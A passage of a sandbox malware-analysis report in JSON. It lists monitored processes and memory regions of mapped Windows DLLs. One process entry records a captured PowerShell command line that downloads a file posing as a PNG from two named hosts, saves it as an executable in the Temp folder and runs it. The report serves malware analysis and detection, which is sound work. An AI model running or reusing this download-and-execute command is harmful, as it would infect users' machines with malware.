"proc_dump_117", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_749", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:01:01.456", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33423360, "type": "region", "version": 1 }, "end_va": 36368383, "entry_point": 33423360, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_750", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33423360, "timestamp": "00:01:01.471", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "PowerShell \"function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,'C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\Mvmubw.exe');Start-Process 'C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\Mvmubw.exe';}try{mihyr8('http://www.events4u.cz/kas23.png')}catch{mihyr8('http://tregartha-dinnie.co.uk/kas23.png')}", "filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_5", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 5, "origin_monitor_id": 4, "ref_parent_process": { "ref_id": "proc_4", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000005-region_00000751-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_118", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_751", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:01.476", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_752", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:01.476", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_753", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:01.476", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000754-addr_0x0000000000090000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_119", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_754", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:01.476", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2001993728, "type": "region", "version": 1 }, "end_va": 2003734527, "entry_point": 2001993728, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_755", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2001993728, "timestamp": "00:01:01.476", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_756", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:01.477", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000757-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_120", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_757", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:01.478", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 487424, "start_va": 5367988224, "type": "region", "version": 1 }, "end_va": 5368475647, "entry_point": 5368038972, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_758", "name": "powershell.exe", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 5367988224, "timestamp": "00:01:01.478", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791790059520, "type": "region", "version": 1 }, "end_va": 8791790063615, "entry_point": 8791790059520, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_759", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791790059520, "timestamp": "00:01:01.478", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_760", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:01.480", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000761-addr_0x000007fffffda000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_121", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092866560, "type": "region", "version": 1 }, "end_va": 8796092870655, "entry_point": 0, "filename": null, "id": "region_761", "name": "private_0x000007fffffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092866560, "timestamp": "00:01:01.481", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000762-addr_0x000007fffffde000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_122", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_762", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:01:01.481", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_763", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:01.503", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_764", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:01.503", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 356351, "entry_point": 0, "filename": null, "id": "region_765", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:01.503", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": "region_766", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:01.503", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000767-addr_0x0000000000070000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_123", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 524287, "entry_point": 0, "filename": null, "id": "region_767", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:01.503", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 536575, "entry_point": 524288, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_768", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:01.503", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1535999, "entry_point": 1114112, "filename": "\\Windows\\System32\\locale.nls", "id": "region_769", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1114112, "timestamp": "00:01:01.504", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000770-addr_0x0000000000180000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_124", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_770", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:01:01.505", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000771-addr_0x0000000000280000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_125", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 3670015, "entry_point": 0, "filename": null, "id": "region_771", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:01:01.505", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 5275647, "entry_point": 0, "filename": null, "id": "region_772", "name": "pagefile_0x0000000000380000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3670016, "timestamp": "00:01:01.505", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 5308416, "type": "region", "version": 1 }, "end_va": 6885375, "entry_point": 0, "filename": null, "id": "region_773", "name": "pagefile_0x0000000000510000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5308416, "timestamp": "00:01:01.505", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 6946816, "type": "region", "version": 1 }, "end_va": 27918335, "entry_point": 0, "filename": null, "id": "region_774", "name": "pagefile_0x00000000006a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6946816, "timestamp": "00:01:01.505", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000775-addr_0x0000000001aa0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_126", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 27918336, "type": "region", "version": 1 }, "end_va": 27922431, "entry_point": 0, "filename": null, "id": "region_775", "name": "private_0x0000000001aa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 27918336, "timestamp": "00:01:01.506", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000776-addr_0x0000000001ab0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_127", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 27983872, "type": "region", "version": 1 }, "end_va": 27987967, "entry_point": 0, "filename": null, "id": "region_776", "name": "private_0x0000000001ab0000", "norm_filename": null, "region_type": "private_memory", "start_va": 27983872, "timestamp": "00:01:01.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1999765504, "type": "region", "version": 1 }, "end_va": 2000941055, "entry_point": 1999855264, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_777", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1999765504, "timestamp": "00:01:01.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2000945152, "type": "region", "version": 1 }, "end_va": 2001969151, "entry_point": 2001052360, "filename": "\\Windows\\System32\\user32.dll", "id": "region_778", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2000945152, "timestamp": "00:01:01.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_779", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:01.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_780", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:01.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 454656, "start_va": 8791599480832, "type": "region", "version": 1 }, "end_va": 8791599935487, "entry_point": 8791599485236, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_781", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 8791599480832, "timestamp": "00:01:01.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 8791723540480, "type": "region", "version": 1 }, "end_va": 8791723642879, "entry_point": 8791723545000, "filename": "\\Windows\\System32\\atl.dll", "id": "region_782", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 8791723540480, "timestamp": "00:01:01.508", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791754539008, "type": "region", "version": 1 }, "end_va": 8791754977279, "entry_point": 8791754551520, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_783", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754539008, "timestamp": "00:01:01.508", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791756505088, "type": "region", "version": 1 }, "end_va": 8791757737983, "entry_point": 8791756827984, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_784", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791756505088, "timestamp": "00:01:01.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791758405632, "type": "region", "version": 1 }, "end_va": 8791758594047, "entry_point": 8791758409744, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_785", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791758405632, "timestamp": "00:01:01.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791759257600, "type": "region", "version": 1 }, "end_va": 8791760154623, "entry_point": 8791759390560, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_786", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791759257600, "timestamp": "00:01:01.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791761747968, "type": "region", "version": 1 }, "end_va": 8791762169855, "entry_point": 8791761793084, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_787", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791761747968, "timestamp": "00:01:01.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791762206720, "type": "region", "version": 1 }, "end_va": 8791763292159, "entry_point": 8791762210916, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_788", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791762206720, "timestamp": "00:01:01.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791763320832, "type": "region", "version": 1 }, "end_va": 8791764144127, "entry_point": 8791763822708, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_789", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791763320832, "timestamp": "00:01:01.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791778394112, "type": "region", "version": 1 }, "end_va": 8791779045375, "entry_point": 8791778403744, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_790", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791778394112, "timestamp": "00:01:01.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791779049472, "type": "region", "version": 1 }, "end_va": 8791781158911, "entry_point": 8791779193648, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_791", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791779049472, "timestamp": "00:01:01.512", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791784095744, "type": "region", "version": 1 }, "end_va": 8791784558591, "entry_point": 8791784168992, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_792", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791784095744, "timestamp": "00:01:01.512", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791784620032, "type": "region", "version": 1 }, "end_va": 8791784677375, "entry_point": 8791784624256, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_793", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791784620032, "timestamp": "00:01:01.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791787241472, "type": "region", "version": 1 }, "end_va": 8791787368447, "entry_point": 8791787266280, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_794", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791787241472, "timestamp": "00:01:01.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791787372544, "type": "region", "version": 1 }, "end_va": 8791788253183, "entry_point": 8791787385460, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_795", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791787372544, "timestamp": "00:01:01.514", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000796-addr_0x0000000001ac0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_128", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 28049408, "type": "region", "version": 1 }, "end_va": 29097983, "entry_point": 0, "filename": null, "id": "region_796", "name": "private_0x0000000001ac0000", "norm_filename": null, "region_type": "private_memory", "start_va": 28049408, "timestamp": "00:01:01.605", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 29097984, "type": "region", "version": 1 }, "end_va": 29102079, "entry_point": 0, "filename": null, "id": "region_797", "name": "pagefile_0x0000000001bc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29097984, "timestamp": "00:01:01.605", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 29163520, "type": "region", "version": 1 }, "end_va": 29167615, "entry_point": 0, "filename": null, "id": "region_798", "name": "pagefile_0x0000000001bd0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29163520, "timestamp": "00:01:01.605", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 29229056, "type": "region", "version": 1 }, "end_va": 29237247, "entry_point": 0, "filename": null, "id": "region_799", "name": "pagefile_0x0000000001be0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29229056, "timestamp": "00:01:01.605", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 29294592, "type": "region", "version": 1 }, "end_va": 29298687, "entry_point": 0, "filename": null, "id": "region_800", "name": "pagefile_0x0000000001bf0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29294592, "timestamp": "00:01:01.605", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 29360128, "type": "region", "version": 1 }, "end_va": 29368319, "entry_point": 0, "filename": null, "id": "region_801", "name": "pagefile_0x0000000001c00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29360128, "timestamp": "00:01:01.605", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000802-addr_0x0000000001c10000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_129", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 29425664, "type": "region", "version": 1 }, "end_va": 29949951, "entry_point": 0, "filename": null, "id": "region_802", "name": "private_0x0000000001c10000", "norm_filename": null, "region_type": "private_memory", "start_va": 29425664, "timestamp": "00:01:01.605", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000803-addr_0x0000000001ca0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_130", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30015488, "type": "region", "version": 1 }, "end_va": 30081023, "entry_point": 0, "filename": null, "id": "region_803", "name": "private_0x0000000001ca0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30015488, "timestamp": "00:01:01.605", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 30081024, "type": "region", "version": 1 }, "end_va": 30994431, "entry_point": 0, "filename": null, "id": "region_804", "name": "pagefile_0x0000000001cb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30081024, "timestamp": "00:01:01.605", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": 